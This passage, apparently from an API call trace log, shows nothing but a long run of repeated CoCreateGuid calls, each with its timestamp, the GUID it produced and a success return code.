CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x4afea2f6, Data2=0x134b, Data3=0x49b1, Data4=([0]=0x98, [1]=0xcd, [2]=0x79, [3]=0x1a, [4]=0x3d, [5]=0x2c, [6]=0x59, [7]=0x3c))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x1ae573d0, Data2=0x229d, Data3=0x4c9c, Data4=([0]=0xb5, [1]=0xb1, [2]=0xa2, [3]=0x8e, [4]=0xdd, [5]=0x17, [6]=0x87, [7]=0x8d))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x899a8070, Data2=0xf526, Data3=0x4475, Data4=([0]=0x94, [1]=0xfe, [2]=0xe6, [3]=0x88, [4]=0x7f, [5]=0x1d, [6]=0x3c, [7]=0xb5))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x1577c940, Data2=0x6bfe, Data3=0x467f, Data4=([0]=0x98, [1]=0xd0, [2]=0x9c, [3]=0xfc, [4]=0x2e, [5]=0x69, [6]=0xd0, [7]=0xf6))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x1fdd11ac, Data2=0xe031, Data3=0x434e, Data4=([0]=0x89, [1]=0xe8, [2]=0xbe, [3]=0x17, [4]=0xbb, [5]=0x7e, [6]=0xd2, [7]=0xb6))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x404c6107, Data2=0xe86b, Data3=0x4c39, Data4=([0]=0xba, [1]=0x3b, [2]=0x25, [3]=0x4c, [4]=0x44, [5]=0xf8, [6]=0x72, [7]=0xb1))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x94bc51c5, Data2=0x69a7, Data3=0x4605, Data4=([0]=0xa5, [1]=0x74, [2]=0xb0, [3]=0x61, [4]=0x7a, [5]=0x4b, [6]=0x70, [7]=0x50))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xf4152dd, Data2=0xb415, Data3=0x478d, Data4=([0]=0x86, [1]=0xbb, [2]=0x6a, [3]=0x5, [4]=0xfc, [5]=0x4, [6]=0x41, [7]=0xea))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x972b688a, Data2=0x29db, Data3=0x4f43, Data4=([0]=0x94, [1]=0x7d, [2]=0x8d, [3]=0x2b, [4]=0xb9, [5]=0x1, [6]=0x9f, [7]=0xa5))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xfb67e6f4, Data2=0x9fd7, Data3=0x4966, Data4=([0]=0xac, [1]=0x63, [2]=0x7f, [3]=0x3a, [4]=0xf8, [5]=0x14, [6]=0xfe, [7]=0x33))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x4b7051b4, Data2=0x3dcd, Data3=0x4de0, Data4=([0]=0xa8, [1]=0x12, [2]=0x31, [3]=0xf7, [4]=0x3c, [5]=0x67, [6]=0xa5, [7]=0x57))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x973b001, Data2=0x1895, Data3=0x46d0, Data4=([0]=0x80, [1]=0x61, [2]=0x20, [3]=0xf3, [4]=0x44, [5]=0x83, [6]=0x20, [7]=0x75))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xb1d596da, Data2=0xe875, Data3=0x4f1a, Data4=([0]=0x83, [1]=0x4f, [2]=0xac, [3]=0x22, [4]=0x9, [5]=0xc3, [6]=0xf2, [7]=0x6c))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x424bacf2, Data2=0xaee5, Data3=0x453b, Data4=([0]=0xa2, [1]=0x2, [2]=0xfb, [3]=0xec, [4]=0xa, [5]=0xf8, [6]=0xfe, [7]=0x26))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xcc960877, Data2=0x3d88, Data3=0x4735, Data4=([0]=0xa0, [1]=0x7d, [2]=0x7, [3]=0xf4, [4]=0xf8, [5]=0x46, [6]=0xe3, [7]=0xab))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xec4a147d, Data2=0xb136, Data3=0x4624, Data4=([0]=0x95, [1]=0x2f, [2]=0xc, [3]=0xba, [4]=0x86, [5]=0x97, [6]=0xd5, [7]=0xb2))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xbf0e6c37, Data2=0x18eb, Data3=0x4a64, Data4=([0]=0x85, [1]=0x31, [2]=0x1c, [3]=0xb0, [4]=0x7c, [5]=0xc8, [6]=0x52, [7]=0xb9))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xf5466abf, Data2=0xc567, Data3=0x4c86, Data4=([0]=0x82, [1]=0x39, [2]=0x47, [3]=0xe3, [4]=0x57, [5]=0x88, [6]=0x6b, [7]=0x17))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x54da9a9b, Data2=0xadc4, Data3=0x4302, Data4=([0]=0xb3, [1]=0x17, [2]=0xcc, [3]=0xb, [4]=0xc4, [5]=0x5b, [6]=0xcc, [7]=0x98))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xdb2ea9a7, Data2=0xda6c, Data3=0x4c4f, Data4=([0]=0x93, [1]=0x49, [2]=0x83, [3]=0x59, [4]=0xe8, [5]=0x4b, [6]=0xad, [7]=0x3c))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x6d0af280, Data2=0xcc6e, Data3=0x4a22, Data4=([0]=0x8e, [1]=0x7a, [2]=0x20, [3]=0xb2, [4]=0x95, [5]=0x1, [6]=0x48, [7]=0x17))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xc6199ac3, Data2=0x6755, Data3=0x401b, Data4=([0]=0x8f, [1]=0x9, [2]=0x21, [3]=0xab, [4]=0x65, [5]=0xf5, [6]=0x1d, [7]=0xcf))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xfce1642b, Data2=0x9d68, Data3=0x4503, Data4=([0]=0x81, [1]=0x21, [2]=0x60, [3]=0x84, [4]=0x66, [5]=0xd2, [6]=0x98, [7]=0x80))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x77b5d53, Data2=0xb42c, Data3=0x4b7d, Data4=([0]=0x92, [1]=0x1f, [2]=0xef, [3]=0x8c, [4]=0xd2, [5]=0x91, [6]=0x45, [7]=0xea))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xc04d9edc, Data2=0x6fbf, Data3=0x49d9, Data4=([0]=0x90, [1]=0x8e, [2]=0x91, [3]=0xbe, [4]=0x91, [5]=0xb5, [6]=0xe8, [7]=0xac))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x414745b0, Data2=0x3fbf, Data3=0x461d, Data4=([0]=0x97, [1]=0xad, [2]=0xde, [3]=0x93, [4]=0xb8, [5]=0x17, [6]=0x4a, [7]=0x5b))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xf30cf563, Data2=0x2890, Data3=0x4d67, Data4=([0]=0xb6, [1]=0x4e, [2]=0xb9, [3]=0xd, [4]=0x4f, [5]=0xbe, [6]=0xc8, [7]=0xa7))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xdde10029, Data2=0x7db6, Data3=0x473f, Data4=([0]=0x8e, [1]=0x21, [2]=0x9f, [3]=0xee, [4]=0x90, [5]=0x7a, [6]=0xad, [7]=0x7c))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xe44c5f01, Data2=0xcb6b, Data3=0x4ec3, Data4=([0]=0x98, [1]=0x27, [2]=0x77, [3]=0xd1, [4]=0x68, [5]=0x27, [6]=0x60, [7]=0x65))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xbd5fe18b, Data2=0xfc31, Data3=0x4576, Data4=([0]=0x8b, [1]=0x2f, [2]=0xe7, [3]=0x4d, [4]=0x4c, [5]=0xd, [6]=0xd3, [7]=0xb4))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x7034dfd8, Data2=0xf0c5, Data3=0x4780, Data4=([0]=0x8f, [1]=0xdd, [2]=0x37, [3]=0x9e, [4]=0xc4, [5]=0x28, [6]=0x8a, [7]=0xae))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x7017ebf4, Data2=0x2dd9, Data3=0x47d6, Data4=([0]=0x85, [1]=0x4, [2]=0xa4, [3]=0x89, [4]=0x5f, [5]=0x50, [6]=0xb5, [7]=0xc1))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x566b8657, Data2=0x9794, Data3=0x4fee, Data4=([0]=0x94, [1]=0x66, [2]=0xd0, [3]=0xb, [4]=0x1d, [5]=0x65, [6]=0x83, [7]=0x92))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x839dc0e3, Data2=0x2d39, Data3=0x44ee, Data4=([0]=0x9d, [1]=0x1d, [2]=0x7, [3]=0xcc, [4]=0x1d, [5]=0x9a, [6]=0x45, [7]=0x7f))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x3486eab1, Data2=0x711b, Data3=0x47d3, Data4=([0]=0xa9, [1]=0x52, [2]=0x55, [3]=0xe, [4]=0x24, [5]=0xd2, [6]=0x39, [7]=0xd2))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x5d2d543d, Data2=0x1495, Data3=0x4fa1, Data4=([0]=0xbc, [1]=0xef, [2]=0x9d, [3]=0x7d, [4]=0x44, [5]=0xf7, [6]=0x8, [7]=0x5d))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xab8be552, Data2=0x8248, Data3=0x42cb, Data4=([0]=0xb0, [1]=0x67, [2]=0x55, [3]=0x7d, [4]=0x50, [5]=0x98, [6]=0xf5, [7]=0xb6))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x860500f2, Data2=0x3247, Data3=0x451e, Data4=([0]=0x91, [1]=0x18, [2]=0xe0, [3]=0x15, [4]=0xc, [5]=0x39, [6]=0x89, [7]=0x92))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x8da080d1, Data2=0xd28b, Data3=0x4c73, Data4=([0]=0xbd, [1]=0xb1, [2]=0xaa, [3]=0xda, [4]=0x44, [5]=0x81, [6]=0x1, [7]=0x6d))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xf7ba6192, Data2=0xf631, Data3=0x4193, Data4=([0]=0x9e, [1]=0xc9, [2]=0x70, [3]=0xc6, [4]=0x36, [5]=0x5f, [6]=0x60, [7]=0x26))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xe407461b, Data2=0x5725, Data3=0x4850, Data4=([0]=0xb2, [1]=0xa6, [2]=0x6a, [3]=0x4d, [4]=0xb8, [5]=0x20, [6]=0x6, [7]=0x3a))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xbb7ee9b8, Data2=0xf05d, Data3=0x4afc, Data4=([0]=0xb2, [1]=0xba, [2]=0xe6, [3]=0xaa, [4]=0x27, [5]=0x5a, [6]=0x9b, [7]=0xb1))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x38b30808, Data2=0x3ad5, Data3=0x4830, Data4=([0]=0x95, [1]=0x15, [2]=0xb3, [3]=0xc8, [4]=0x48, [5]=0x2a, [6]=0x2a, [7]=0xf7))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x8efc5f07, Data2=0x51e4, Data3=0x436d, Data4=([0]=0x9b, [1]=0xf7, [2]=0x8b, [3]=0x10, [4]=0xf8, [5]=0xfd, [6]=0xc8, [7]=0x6))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xfd6fb082, Data2=0xf24f, Data3=0x409c, Data4=([0]=0x95, [1]=0xac, [2]=0xdb, [3]=0xeb, [4]=0x25, [5]=0x32, [6]=0xef, [7]=0x61))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xec85b147, Data2=0x1734, Data3=0x4a44, Data4=([0]=0x88, [1]=0xcc, [2]=0xa2, [3]=0x2e, [4]=0x1a, [5]=0x3f, [6]=0x9c, [7]=0x37))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xd89ab2c, Data2=0x90f4, Data3=0x446c, Data4=([0]=0xbc, [1]=0x13, [2]=0xbc, [3]=0xa, [4]=0xb2, [5]=0xd0, [6]=0x3b, [7]=0x3a))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x77856c82, Data2=0x386f, Data3=0x4af1, Data4=([0]=0x82, [1]=0x8a, [2]=0x2a, [3]=0x7a, [4]=0xaf, [5]=0xc6, [6]=0x6e, [7]=0x69))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xe3f19e2c, Data2=0x3919, Data3=0x42bb, Data4=([0]=0x9b, [1]=0x6b, [2]=0x95, [3]=0xe8, [4]=0xfd, [5]=0xc3, [6]=0x1f, [7]=0xf8))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x5b21e55, Data2=0x3d05, Data3=0x450b, Data4=([0]=0x8e, [1]=0x1b, [2]=0xc8, [3]=0xaa, [4]=0xda, [5]=0xa2, [6]=0xf8, [7]=0xb2))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xd0d2eaa4, Data2=0x1f7, Data3=0x4ef7, Data4=([0]=0x99, [1]=0x5, [2]=0xda, [3]=0x9f, [4]=0xc3, [5]=0x5f, [6]=0x27, [7]=0x54))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x198cd3bd, Data2=0xd53c, Data3=0x4fd3, Data4=([0]=0x91, [1]=0x87, [2]=0x6e, [3]=0x1b, [4]=0x90, [5]=0x17, [6]=0x74, [7]=0xc0))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x255482cb, Data2=0x6daa, Data3=0x49db, Data4=([0]=0xb6, [1]=0xd7, [2]=0x7c, [3]=0xf5, [4]=0x7e, [5]=0xc5, [6]=0x47, [7]=0x61))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x96f68242, Data2=0x612, Data3=0x4c21, Data4=([0]=0xa0, [1]=0x9e, [2]=0x4a, [3]=0x55, [4]=0xc, [5]=0x76, [6]=0xb0, [7]=0x31))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x662e671b, Data2=0x5559, Data3=0x4274, Data4=([0]=0x8a, [1]=0xdc, [2]=0x42, [3]=0x26, [4]=0x76, [5]=0xd4, [6]=0x4f, [7]=0xf8))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x24b92f3e, Data2=0xb59a, Data3=0x4b62, Data4=([0]=0xa4, [1]=0x35, [2]=0x69, [3]=0xf4, [4]=0x93, [5]=0x1b, [6]=0x99, [7]=0x53))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x1fce3248, Data2=0x95e, Data3=0x419b, Data4=([0]=0xb6, [1]=0x12, [2]=0x84, [3]=0x6, [4]=0x79, [5]=0xa9, [6]=0x22, [7]=0x68))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x9ca422b3, Data2=0x3451, Data3=0x487f, Data4=([0]=0xa1, [1]=0xb4, [2]=0x54, [3]=0xc6, [4]=0xd1, [5]=0x40, [6]=0x60, [7]=0xc5))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xc49a5c7b, Data2=0x250b, Data3=0x427f, Data4=([0]=0x91, [1]=0x36, [2]=0xdf, [3]=0xde, [4]=0x56, [5]=0x59, [6]=0xb0, [7]=0x21))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x4f3e96fe, Data2=0x8b6a, Data3=0x481e, Data4=([0]=0x87, [1]=0xca, [2]=0x7b, [3]=0x24, [4]=0xc7, [5]=0x4e, [6]=0x8a, [7]=0xa4))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xa25f1965, Data2=0x8b85, Data3=0x4c1f, Data4=([0]=0xa8, [1]=0xf2, [2]=0x25, [3]=0x92, [4]=0x20, [5]=0x7f, [6]=0xfc, [7]=0x7a))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xd3e6ef40, Data2=0xa0ad, Data3=0x4499, Data4=([0]=0xaa, [1]=0x6c, [2]=0x8f, [3]=0x95, [4]=0xda, [5]=0x44, [6]=0xfb, [7]=0x27))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x7667cc0b, Data2=0xc878, Data3=0x4bae, Data4=([0]=0x93, [1]=0xbf, [2]=0x5b, [3]=0xe5, [4]=0xd4, [5]=0x5, [6]=0xe3, [7]=0xaf))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x30c284fe, Data2=0x536f, Data3=0x4fa0, Data4=([0]=0xa3, [1]=0x8, [2]=0xe2, [3]=0x2, [4]=0x4e, [5]=0x91, [6]=0x15, [7]=0xbc))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xbb64a4b4, Data2=0x1ed2, Data3=0x49a2, Data4=([0]=0x9f, [1]=0x17, [2]=0x9b, [3]=0xba, [4]=0x3d, [5]=0x3c, [6]=0x43, [7]=0x4f))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x91491f32, Data2=0x5204, Data3=0x476b, Data4=([0]=0xa8, [1]=0xf5, [2]=0xb, [3]=0xe3, [4]=0x98, [5]=0x84, [6]=0x5d, [7]=0x9b))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xa7486191, Data2=0xdd62, Data3=0x46a9, Data4=([0]=0xa5, [1]=0x79, [2]=0xca, [3]=0x53, [4]=0x33, [5]=0xdd, [6]=0x7c, [7]=0xa2))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xf89e526a, Data2=0xa1fd, Data3=0x42b1, Data4=([0]=0x8f, [1]=0xd5, [2]=0x78, [3]=0xc3, [4]=0x54, [5]=0x9, [6]=0x56, [7]=0xee))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xe2134335, Data2=0x506e, Data3=0x4aad, Data4=([0]=0x91, [1]=0xa4, [2]=0xd, [3]=0xc3, [4]=0xbe, [5]=0x49, [6]=0x9b, [7]=0x5))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x41361094, Data2=0x7011, Data3=0x4541, Data4=([0]=0x87, [1]=0x5a, [2]=0xcb, [3]=0xa6, [4]=0x8f, [5]=0xfa, [6]=0x7f, [7]=0x0))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x9b263ec, Data2=0x508, Data3=0x4fc7, Data4=([0]=0x8c, [1]=0xa3, [2]=0x8d, [3]=0x93, [4]=0x74, [5]=0x10, [6]=0xd0, [7]=0xba))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x47e76c3f, Data2=0x1236, Data3=0x47ef, Data4=([0]=0xb6, [1]=0xca, [2]=0x7a, [3]=0xe9, [4]=0x5e, [5]=0x1d, [6]=0x81, [7]=0xf0))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x6bd68f65, Data2=0x4a6e, Data3=0x4137, Data4=([0]=0x82, [1]=0xd4, [2]=0xf3, [3]=0xc1, [4]=0x62, [5]=0xc9, [6]=0x69, [7]=0xb1))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xc052a403, Data2=0xe070, Data3=0x4f21, Data4=([0]=0x9a, [1]=0x87, [2]=0xfd, [3]=0xe3, [4]=0x28, [5]=0x36, [6]=0x29, [7]=0x5b))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x842c5795, Data2=0x7f43, Data3=0x465a, Data4=([0]=0x94, [1]=0xeb, [2]=0xd8, [3]=0xde, [4]=0x71, [5]=0x3, [6]=0xfd, [7]=0xc7))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x6c668a71, Data2=0xdc, Data3=0x4ae8, Data4=([0]=0xb9, [1]=0x90, [2]=0x67, [3]=0xbf, [4]=0xf, [5]=0x34, [6]=0x89, [7]=0x30))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x5633a5df, Data2=0x92f8, Data3=0x4b8b, Data4=([0]=0x8f, [1]=0x4f, [2]=0xb9, [3]=0x82, [4]=0xf0, [5]=0xc2, [6]=0x7c, [7]=0xc3))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x80d944b9, Data2=0x26c1, Data3=0x4d69, Data4=([0]=0x8f, [1]=0x5, [2]=0x58, [3]=0x7, [4]=0x82, [5]=0xcb, [6]=0xd8, [7]=0x29))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x8737784b, Data2=0xa212, Data3=0x4ecf, Data4=([0]=0x9d, [1]=0x5f, [2]=0x6f, [3]=0x56, [4]=0x75, [5]=0x32, [6]=0xdc, [7]=0x8a))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x8c44d5ef, Data2=0x6612, Data3=0x4649, Data4=([0]=0x98, [1]=0x1e, [2]=0x51, [3]=0xa3, [4]=0xae, [5]=0x13, [6]=0x79, [7]=0x9))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xacb2d507, Data2=0xa716, Data3=0x44a9, Data4=([0]=0xb8, [1]=0xfc, [2]=0xaf, [3]=0xc7, [4]=0x11, [5]=0xbb, [6]=0x40, [7]=0xe7))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x32c71392, Data2=0x82f6, Data3=0x4f4c, Data4=([0]=0x88, [1]=0xf2, [2]=0x7e, [3]=0x71, [4]=0xfa, [5]=0x24, [6]=0x1, [7]=0xb0))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xf7d2aa0c, Data2=0xc41c, Data3=0x421b, Data4=([0]=0x8b, [1]=0xeb, [2]=0x5b, [3]=0x70, [4]=0x35, [5]=0xaa, [6]=0xc9, [7]=0xc6))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x62165074, Data2=0x5de7, Data3=0x40a5, Data4=([0]=0x80, [1]=0xf1, [2]=0x23, [3]=0x5e, [4]=0x42, [5]=0xac, [6]=0x22, [7]=0xb0))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x430ad3b6, Data2=0xb5a, Data3=0x4fff, Data4=([0]=0xb5, [1]=0xe4, [2]=0xe0, [3]=0x25, [4]=0x20, [5]=0xa0, [6]=0xd5, [7]=0xec))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x95902a27, Data2=0x341e, Data3=0x484d, Data4=([0]=0xa9, [1]=0x61, [2]=0xec, [3]=0xea, [4]=0xa6, [5]=0x1a, [6]=0xab, [7]=0x9d))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x1e9f51a9, Data2=0x97cf, Data3=0x483d, Data4=([0]=0xbf, [1]=0xf4, [2]=0xb4, [3]=0xa1, [4]=0x1, [5]=0x92, [6]=0xa8, [7]=0x5))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xa0547346, Data2=0xf0cc, Data3=0x46be, Data4=([0]=0x96, [1]=0xad, [2]=0x7, [3]=0x86, [4]=0xdd, [5]=0xd4, [6]=0xe, [7]=0xa8))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x6beaa51, Data2=0x3c77, Data3=0x476f, Data4=([0]=0xac, [1]=0xaa, [2]=0x3b, [3]=0xa2, [4]=0x23, [5]=0x31, [6]=0x65, [7]=0xa3))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xccc5f0b5, Data2=0xae3f, Data3=0x4285, Data4=([0]=0x8b, [1]=0x65, [2]=0x2a, [3]=0xe0, [4]=0x81, [5]=0xb8, [6]=0x52, [7]=0x60))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x2d2b728f, Data2=0xabb1, Data3=0x4902, Data4=([0]=0x9c, [1]=0xb1, [2]=0xbb, [3]=0x95, [4]=0xe9, [5]=0xf2, [6]=0xb, [7]=0xd3))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x507eb819, Data2=0xa85e, Data3=0x41c0, Data4=([0]=0x9c, [1]=0x0, [2]=0xa9, [3]=0x2e, [4]=0x10, [5]=0x32, [6]=0xd8, [7]=0xb9))) returned 0x0 [0044.317] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xd89a235f, Data2=0x272b, Data3=0x4b1d, Data4=([0]=0x9d, [1]=0xc3, [2]=0xdd, [3]=0xb2, [4]=0x91, [5]=0x71, [6]=0x56, [7]=0x95))) returned 0x0 [0044.318] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xa78fd9a, Data2=0x4f4c, Data3=0x41aa, Data4=([0]=0x89, [1]=0x10, [2]=0x8b, [3]=0x78, [4]=0x99, [5]=0xb4, [6]=0xb, [7]=0x4b))) returned 0x0 [0044.318] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x8eef57f9, Data2=0x8eb6, Data3=0x4491, Data4=([0]=0x8c, [1]=0x1, [2]=0x6, [3]=0x21, [4]=0x6e, [5]=0xf8, [6]=0x21, [7]=0x85))) returned 0x0 [0044.318] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x2e4da643, Data2=0xfe64, Data3=0x40a7, Data4=([0]=0x94, [1]=0x1c, [2]=0x37, [3]=0x60, [4]=0x9c, [5]=0x95, [6]=0xad, [7]=0x21))) returned 0x0 [0044.318] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xe2dd5540, Data2=0x83df, Data3=0x493c, Data4=([0]=0x83, [1]=0x7e, [2]=0xfb, [3]=0x93, [4]=0x10, 